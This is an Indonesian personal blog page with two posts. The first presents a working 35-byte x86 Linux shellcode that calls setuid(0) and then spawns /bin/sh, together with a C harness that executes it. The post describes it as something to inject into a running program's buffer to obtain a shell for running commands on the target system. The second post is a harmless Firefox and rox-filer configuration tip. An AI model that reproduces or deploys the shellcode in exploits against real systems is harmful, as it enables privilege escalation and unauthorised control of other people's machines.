Saturday, July 10, 2010

Setuid(0) && execve("/bin//sh",0,0) shellcode

Ini didapat dari hasi baca saja, inti dari kode ini yaitu eksekusi shellcode. Apabila shellcode ini masuk ke dalam buffer program yang berjalan kemudian tereksekusi maka akan menghasilkan sebuah shell di dalam system yang mana kita bisa menggunakan shell tersebut untuk mengeksekusi perintah-perintah di dalam sistem di mana program dijalankan. 
// 35 bytes

char shellcode[]=
"\x31\xc0"                      //xor    %eax,%eax
"\x31\xdb"                      //xor    %ebx,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xb0\x17"                      //mov    $0x17,%al
"\x31\xdb"                      //xor    %ebx,%ebx
"\xcd\x80"                      //int    $0x80
"\xb0\x0b"                      //mov    $0xb,%al
"\x53"                          //push   %ebx
"\x68\x2f\x2f\x73\x68"          //push   $0x68732f2f
"\x68\x2f\x62\x69\x6e"          //push   $0x6e69622f
"\x89\xe3"                      //mov    %esp,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xcd\x80";                     //int    $0x80

int main(void)
{
 (*(void(*)()) shellcode)();
}
Posted by at No comments:

Tuesday, July 6, 2010

Combining "rox-filer" with "firefox"



Ketika anda benar-benar ingin menggunakan window manager yang minimalis seperti yang "box-box" itu, mungkin anda akan menemukan permasalahan yang sama, yaitu tidak dapat melakukan "Open download folder" secara langsung melalui klik kanan download managernya firefox. Berikut ini merupakan cara yang saya pakai (sesuai dengan penalaran saya sendiri) untuk mengatasi hal di atas :

1. create file "~/.mozilla/firefox/rox.sh"

#!/bin/sh
# rox launcher for firefox
# by : zam a.k.a. s3m
if [ -z "$1" ] 
then
 exit 65
else
 /usr/bin/rox -U $1
fi

2. chmod file "~/.mozilla/firefox/rox.sh"

zam@darkstar$ chmod +x ~/.mozilla/firefox/rox.sh

3. edit file "~/.mozilla/firefox/xxxxxxxx.default/mimeTypes.rdf"
Bagian terpenting yang di edit adalah :
  
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />

Berikut Keseluruhan isi file : 
<?xml version="1.0"?>
<RDF:RDF xmlns:NC="http://home.netscape.com/NC-rdf#"
         xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <RDF:Description RDF:about="urn:scheme:handler:mailto"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/thunderbird"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:rtsp"
                   NC:value="rtsp">
    <NC:handlerProp RDF:resource="urn:scheme:handler:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-bzip2"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:mms"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gnome-mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:file"
                   NC:value="file">
    <NC:handlerProp RDF:resource="urn:scheme:handler:file"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&url=%s"
                   NC:prettyName="GMail"
                   NC:uriTemplate="https://mail.google.com/mail/?extsrc=mailto&url=%s" />
  <RDF:Description RDF:about="urn:handler:local:~/.mozilla/firefox/rox.sh"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:scheme:webcal"
                   NC:value="webcal">
    <NC:handlerProp RDF:resource="urn:scheme:handler:webcal"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/thunderbird"
                   NC:prettyName="thunderbird"
                   NC:path="/usr/bin/thunderbird" />
  <RDF:Description RDF:about="urn:handler:web:https://www.mibbit.com/?url=%s"
                   NC:prettyName="Mibbit"
                   NC:uriTemplate="https://www.mibbit.com/?url=%s" />
  <RDF:Description RDF:about="urn:mimetype:text/x-sh"
                   NC:value="text/x-sh"
                   NC:editable="true"
                   NC:description="shell script">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-csrc"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-csrc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:webcal"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/mplayer"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:scheme:handler:irc"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"
                   NC:prettyName="Yahoo! Mail"
                   NC:uriTemplate="http://compose.mail.yahoo.com/?To=%s" />
  <RDF:Description RDF:about="urn:scheme:handler:ircs"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:rtsp"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:mimetype:application/zip"
                   NC:value="application/zip"
                   NC:editable="true"
                   NC:description="Zip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/zip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gnome-mplayer"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:handler:audio/mpeg3"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:audio/mpeg3"
                   NC:value="audio/mpeg3"
                   NC:editable="true"
                   NC:description="">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-java-archive"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-gzip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:rtsp"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/xine"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gxine"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/xine"
                   NC:prettyName="xine"
                   NC:path="/usr/bin/xine" />
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-sh"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:schemes">
    <NC:Protocol-Schemes RDF:resource="urn:schemes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mms"
                   NC:value="mms">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:file"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:mimetypes">
    <NC:MIME-types RDF:resource="urn:mimetypes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-gzip"
                   NC:value="application/x-gzip"
                   NC:editable="true"
                   NC:description="Gzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gxine"
                   NC:prettyName="gxine"
                   NC:path="/usr/bin/gxine" />
  <RDF:Description RDF:about="urn:mimetype:handler:application/zip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/zip"/>
  </RDF:Description>
  <RDF:Seq RDF:about="urn:schemes:root">
    <RDF:li RDF:resource="urn:scheme:mailto"/>
    <RDF:li RDF:resource="urn:scheme:irc"/>
    <RDF:li RDF:resource="urn:scheme:ircs"/>
    <RDF:li RDF:resource="urn:scheme:webcal"/>
    <RDF:li RDF:resource="urn:scheme:file"/>
    <RDF:li RDF:resource="urn:scheme:rtsp"/>
    <RDF:li RDF:resource="urn:scheme:mms"/>
  </RDF:Seq>
  <RDF:Seq RDF:about="urn:mimetypes:root">
    <RDF:li RDF:resource="urn:mimetype:application/x-gzip"/>
    <RDF:li RDF:resource="urn:mimetype:audio/mpeg3"/>
    <RDF:li RDF:resource="urn:mimetype:application/zip"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-java-archive"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-csrc"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-bzip2"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-sh"/>
  </RDF:Seq>
  <RDF:Description RDF:about="urn:scheme:irc"
                   NC:value="irc">
    <NC:handlerProp RDF:resource="urn:scheme:handler:irc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:file"
                   NC:alwaysAsk="false">
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:file"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:~/.mozilla/firefox/rox.sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mailto"
                   NC:value="mailto">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mailto"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:ircs"
                   NC:value="ircs">
    <NC:handlerProp RDF:resource="urn:scheme:handler:ircs"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-bzip2"
                   NC:value="application/x-bzip2"
                   NC:editable="true"
                   NC:description="Bzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-java-archive"
                   NC:value="application/x-java-archive"
                   NC:editable="true"
                   NC:description="Java Archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://30boxes.com/external/widget?refer=ff&url=%s"
                   NC:prettyName="30 Boxes"
                   NC:uriTemplate="http://30boxes.com/external/widget?refer=ff&url=%s" />
  <RDF:Description RDF:about="urn:root"
                   NC:en-US_defaultHandlersVersion="3" />
  <RDF:Description RDF:about="urn:scheme:externalApplication:mms"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:text/x-csrc"
                   NC:value="text/x-csrc"
                   NC:editable="true"
                   NC:description="C source code">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-csrc"/>
  </RDF:Description>
</RDF:RDF>

4. restart firefox and download some file, then try "Open" or "Open containing folder" menu ;).
Posted by at No comments:
Subscribe to: Posts (Atom)